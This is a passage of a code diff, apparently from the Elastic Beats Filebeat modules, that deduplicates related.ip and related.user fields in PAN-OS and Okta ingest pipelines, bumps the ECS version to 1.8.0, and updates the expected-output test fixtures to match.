States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"type\":\"WEB\"},\"uuid\":\"faf7398a-4f77-11ea-97fb-5925e98228bd\",\"version\":\"0\"}", "event.outcome": "success", "event.type": [ - "access" + "end", + "user" ], "fileset.name": "system", "input.type": "log", @@ -47,8 +49,12 @@ "okta.transaction.id": "XkccyyMli2Uay2I93ZgRzQAAB0c", "okta.transaction.type": "WEB", "okta.uuid": "faf7398a-4f77-11ea-97fb-5925e98228bd", - "related.ip": "108.255.197.247", - "related.user": "xxxxxx", + "related.ip": [ + "108.255.197.247" + ], + "related.user": [ + "xxxxxx" + ], "service.type": "okta", "source.as.number": 7018, "source.as.organization.name": "AT&T Services, Inc.", @@ -66,6 +72,7 @@ "tags": [ "forwarded" ], + "user.full_name": "xxxxxx", "user_agent.device.name": "Mac", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0", @@ -86,7 +93,8 @@ "client.user.id": "00u1abvz4pYqdM8ms4x6", "event.action": "user.session.start", "event.category": [ - "authentication" + "authentication", + "session" ], "event.dataset": "okta.system", "event.id": "3aeede38-4f67-11ea-abd3-1f5d113f2546", @@ -95,7 +103,8 @@ "event.original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"User login to Okta\",\"eventType\":\"user.session.start\",\"legacyEventType\":\"core.user_auth.login_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.718Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3aeede38-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}", "event.outcome": "success", "event.type": [ - "access" + "start", + "user" ], "fileset.name": "system", "input.type": "log", @@ -123,8 +132,12 @@ "okta.transaction.id": "XkcAsWb8WjwDP76xh@1v8wAABp0", "okta.transaction.type": "WEB", "okta.uuid": "3aeede38-4f67-11ea-abd3-1f5d113f2546", - "related.ip": "108.255.197.247", - "related.user": "xxxxxx", + "related.ip": [ + "108.255.197.247" + ], + "related.user": [ + "xxxxxx" + ], "service.type": "okta", "source.as.number": 7018, "source.as.organization.name": "AT&T Services, Inc.", @@ -142,6 +155,7 @@ "tags": [ "forwarded" ], + "user.full_name": "xxxxxx", "user_agent.device.name": "Mac", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0", @@ -171,7 +185,7 @@ "event.original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"108.255.197.247\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"108.255.197.247\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3af594f9-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}", "event.outcome": "success", "event.type": [ - "access" + "info" ], "fileset.name": "system", "input.type": "log", @@ -214,8 +228,12 @@ "okta.transaction.id": "XkcAsWb8WjwDP76xh@1v8wAABp0", "okta.transaction.type": "WEB", "okta.uuid": "3af594f9-4f67-11ea-abd3-1f5d113f2546", - "related.ip": "108.255.197.247", - "related.user": "xxxxxx", + "related.ip": [ + "108.255.197.247" + ], + "related.user": [ + "xxxxxx" + ], "service.type": "okta", "source.as.number": 7018, "source.as.organization.name": "AT&T Services, Inc.", @@ -233,6 +251,7 @@ "tags": [ "forwarded" ], + "user.full_name": "xxxxxx", "user_agent.device.name": "Mac", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0", diff --git a/x-pack/filebeat/module/oracle/database_audit/config/config.yml b/x-pack/filebeat/module/oracle/database_audit/config/config.yml index 351a4c26f7d1..09552183e0de 100644 --- a/x-pack/filebeat/module/oracle/database_audit/config/config.yml +++ b/x-pack/filebeat/module/oracle/database_audit/config/config.yml @@ -18,4 +18,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/panw/panos/config/input.yml b/x-pack/filebeat/module/panw/panos/config/input.yml index 3d3f0be207f0..8fa5bd129585 100644 --- a/x-pack/filebeat/module/panw/panos/config/input.yml +++ b/x-pack/filebeat/module/panw/panos/config/input.yml @@ -209,4 +209,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/panw/panos/ingest/pipeline.yml b/x-pack/filebeat/module/panw/panos/ingest/pipeline.yml index 3bf76a0c5c17..42d2f4ff9c17 100644 --- a/x-pack/filebeat/module/panw/panos/ingest/pipeline.yml +++ b/x-pack/filebeat/module/panw/panos/ingest/pipeline.yml @@ -385,21 +385,25 @@ processors: - append: if: 'ctx?.source?.ip != null' field: related.ip + allow_duplicates: false value: - '{{source.ip}}' - append: if: 'ctx?.destination?.ip != null' field: related.ip + allow_duplicates: false value: - '{{destination.ip}}' - append: if: 'ctx?.source?.nat?.ip != null' field: related.ip + allow_duplicates: false value: - '{{source.nat.ip}}' - append: if: 'ctx?.destination?.nat?.ip != null' field: related.ip + allow_duplicates: false value: - '{{destination.nat.ip}}' @@ -528,43 +532,51 @@ processors: - append: field: related.user + allow_duplicates: false value: "{{client.user.name}}" if: "ctx?.client?.user?.name != null" - append: field: related.user + allow_duplicates: false value: "{{source.user.name}}" if: "ctx?.source?.user?.name != null" - append: field: related.user + allow_duplicates: false value: "{{server.user.name}}" if: "ctx?.server?.user?.name != null" - append: field: related.user + allow_duplicates: false value: "{{destination.user.name}}" if: "ctx?.destination?.user?.name != null" - append: field: related.user + allow_duplicates: false value: "{{url.username}}" if: "ctx?.url?.username != null && ctx?.url?.username != ''" allow_duplicates: false - append: field: related.hash + allow_duplicates: false value: "{{panw.panos.file.hash}}" if: "ctx?.panw?.panos?.file?.hash != null" - append: field: related.hosts + allow_duplicates: false value: "{{observer.hostname}}" if: "ctx?.observer?.hostname != null && ctx.observer?.hostname != ''" allow_duplicates: false - append: field: related.hosts + allow_duplicates: false value: "{{url.domain}}" if: "ctx?.url?.domain != null && ctx.url?.domain != ''" allow_duplicates: false diff --git a/x-pack/filebeat/module/panw/panos/test/pan_inc_other.log-expected.json b/x-pack/filebeat/module/panw/panos/test/pan_inc_other.log-expected.json index 54a45d4465e7..a6777dca5e6e 100644 --- a/x-pack/filebeat/module/panw/panos/test/pan_inc_other.log-expected.json +++ b/x-pack/filebeat/module/panw/panos/test/pan_inc_other.log-expected.json @@ -803,11 +803,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", diff --git a/x-pack/filebeat/module/panw/panos/test/pan_inc_threat.log-expected.json b/x-pack/filebeat/module/panw/panos/test/pan_inc_threat.log-expected.json index cf6c021da903..10ea226c1ee2 100644 --- a/x-pack/filebeat/module/panw/panos/test/pan_inc_threat.log-expected.json +++ b/x-pack/filebeat/module/panw/panos/test/pan_inc_threat.log-expected.json @@ -75,11 +75,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -176,11 +174,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -278,11 +274,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -380,11 +374,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -482,11 +474,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -584,11 +574,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -686,11 +674,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -787,11 +773,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -888,11 +872,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -989,11 +971,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1091,11 +1071,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1191,11 +1169,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1292,11 +1268,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1393,11 +1367,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1495,11 +1467,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1596,11 +1566,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1693,11 +1661,9 @@ "related.ip": [ "192.168.0.2", "78.159.99.224", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1795,11 +1761,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1895,11 +1859,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1995,11 +1957,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2096,11 +2056,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2196,11 +2154,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2294,11 +2250,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2389,11 +2343,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2484,11 +2436,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2579,11 +2529,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2674,11 +2622,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2769,11 +2715,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2864,11 +2808,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2959,11 +2901,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3054,11 +2994,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3149,11 +3087,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3244,11 +3180,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3338,11 +3272,9 @@ "related.ip": [ "192.168.0.2", "69.43.161.167", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3436,11 +3368,9 @@ "related.ip": [ "192.168.0.2", "202.31.187.154", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3534,11 +3464,9 @@ "related.ip": [ "192.168.0.2", "89.111.176.67", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3634,11 +3562,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3732,11 +3658,9 @@ "related.ip": [ "192.168.0.2", "208.73.210.29", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3829,11 +3753,9 @@ "related.ip": [ "192.168.0.2", "208.73.210.29", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3929,11 +3851,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -4026,11 +3946,9 @@ "related.ip": [ "192.168.0.2", "208.73.210.29", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -4124,11 +4042,9 @@ "related.ip": [ "192.168.0.2", "89.108.64.156", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -4221,11 +4137,9 @@ "related.ip": [ "192.168.0.2", "89.108.64.156", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -4307,11 +4221,9 @@ "related.ip": [ "204.232.231.46", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -4413,11 +4325,9 @@ "related.ip": [ "192.168.0.2", "216.8.179.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -4509,11 +4419,9 @@ "related.ip": [ "192.168.0.2", "69.43.161.154", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -4605,11 +4513,9 @@ "related.ip": [ "192.168.0.2", "208.91.196.252", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -4702,11 +4608,9 @@ "related.ip": [ "192.168.0.2", "208.73.210.29", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -4801,11 +4705,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -4900,11 +4802,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5000,11 +4900,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5100,11 +4998,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5200,11 +5096,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5289,11 +5183,9 @@ "related.ip": [ "173.236.179.57", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5395,11 +5287,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5484,11 +5374,9 @@ "related.ip": [ "91.209.163.202", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5579,11 +5467,9 @@ "related.ip": [ "122.226.169.183", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5684,11 +5570,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5773,11 +5657,9 @@ "related.ip": [ "109.201.131.15", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5865,11 +5747,9 @@ "related.ip": [ "91.209.163.202", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5968,11 +5848,9 @@ "related.ip": [ "192.168.0.2", "213.180.199.61", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -6065,11 +5943,9 @@ "related.ip": [ "192.168.0.2", "213.180.199.61", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -6162,11 +6038,9 @@ "related.ip": [ "192.168.0.2", "213.180.199.61", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -6251,11 +6125,9 @@ "related.ip": [ "173.236.179.57", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -6357,11 +6229,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -6456,11 +6326,9 @@ "related.ip": [ "192.168.0.6", "207.46.140.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "jordy", "jordy" ], "rule.name": "rule1", @@ -6541,11 +6409,9 @@ "related.ip": [ "65.54.161.34", "192.168.0.6", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "jordy", "jordy" ], "rule.name": "rule1", @@ -6636,11 +6502,9 @@ "related.ip": [ "65.55.5.231", "192.168.0.6", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "jordy", "jordy" ], "rule.name": "rule1", @@ -6741,11 +6605,9 @@ "related.ip": [ "192.168.0.6", "65.54.71.11", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "jordy", "jordy" ], "rule.name": "rule1", @@ -6825,11 +6687,9 @@ "related.ip": [ "74.125.239.17", "192.168.0.6", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "jordy", "jordy" ], "rule.name": "rule1", @@ -6924,11 +6784,9 @@ "related.ip": [ "192.168.0.2", "208.85.40.48", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "picard", "picard" ], "rule.name": "rule1", @@ -7008,11 +6866,9 @@ "related.ip": [ "74.125.224.198", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "picard", "picard" ], "rule.name": "rule1", @@ -7100,11 +6956,9 @@ "related.ip": [ "188.190.124.75", "192.168.0.6", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "jordy", "jordy" ], "rule.name": "rule1", @@ -7194,11 +7048,9 @@ "related.ip": [ "74.125.224.200", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "picard", "picard" ], "rule.name": "rule1", @@ -7285,11 +7137,9 @@ "related.ip": [ "74.125.239.3", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "picard", "picard" ], "rule.name": "rule1", @@ -7376,11 +7226,9 @@ "related.ip": [ "74.125.239.3", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "picard", "picard" ], "rule.name": "rule1", @@ -7467,11 +7315,9 @@ "related.ip": [ "74.125.224.200", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "picard", "picard" ], "rule.name": "rule1", @@ -7566,11 +7412,9 @@ "related.ip": [ "192.168.0.2", "74.125.239.6", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "picard", "picard" ], "rule.name": "rule1", @@ -7650,11 +7494,9 @@ "related.ip": [ "74.125.224.193", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "picard", "picard" ], "rule.name": "rule1", @@ -7742,11 +7584,9 @@ "related.ip": [ "74.125.239.20", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "picard", "picard" ], "rule.name": "rule1", @@ -7833,11 +7673,9 @@ "related.ip": [ "208.80.154.225", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "picard", "picard" ], "rule.name": "rule1", @@ -7925,11 +7763,9 @@ "related.ip": [ "208.80.154.234", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "picard", "picard" ], "rule.name": "rule1", @@ -8017,11 +7853,9 @@ "related.ip": [ "65.54.75.25", "192.168.0.6", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "jordy", "jordy" ], "rule.name": "rule1", @@ -8111,11 +7945,9 @@ "related.ip": [ "74.125.224.206", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "jordy", "jordy" ], "rule.name": "rule1", @@ -8202,11 +8034,9 @@ "related.ip": [ "74.125.224.195", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "jordy", "jordy" ], "rule.name": "rule1", @@ -8294,11 +8124,9 @@ "related.ip": [ "207.178.96.34", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "jordy", "jordy" ], "rule.name": "rule1", @@ -8388,11 +8216,9 @@ "related.ip": [ "74.125.224.195", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "picard", "picard" ], "rule.name": "rule1", @@ -8479,11 +8305,9 @@ "related.ip": [ "74.125.239.20", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "picard", "picard" ], "rule.name": "rule1", @@ -8571,11 +8395,9 @@ "related.ip": [ "66.152.109.24", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "picard", "picard" ], "rule.name": "rule1", @@ -8665,11 +8487,9 @@ "related.ip": [ "74.125.224.200", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "picard", "picard" ], "rule.name": "rule1", @@ -8764,11 +8584,9 @@ "related.ip": [ "192.168.0.2", "74.125.224.201", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "picard", "picard" ], "rule.name": "rule1", @@ -8848,11 +8666,9 @@ "related.ip": [ "74.125.224.200", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "picard", "picard" ], "rule.name": "rule1", @@ -8939,11 +8755,9 @@ "related.ip": [ "74.125.224.200", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "picard", "picard" ], "rule.name": "rule1", @@ -9038,11 +8852,9 @@ "related.ip": [ "192.168.0.2", "208.85.40.48", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "jordy", "jordy" ], "rule.name": "rule1", @@ -9122,11 +8934,9 @@ "related.ip": [ "74.125.224.201", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "jordy", "jordy" ], "rule.name": "rule1", @@ -9213,11 +9023,9 @@ "related.ip": [ "74.125.224.201", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "jordy", "jordy" ], "rule.name": "rule1", @@ -9304,11 +9112,9 @@ "related.ip": [ "74.125.224.200", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - 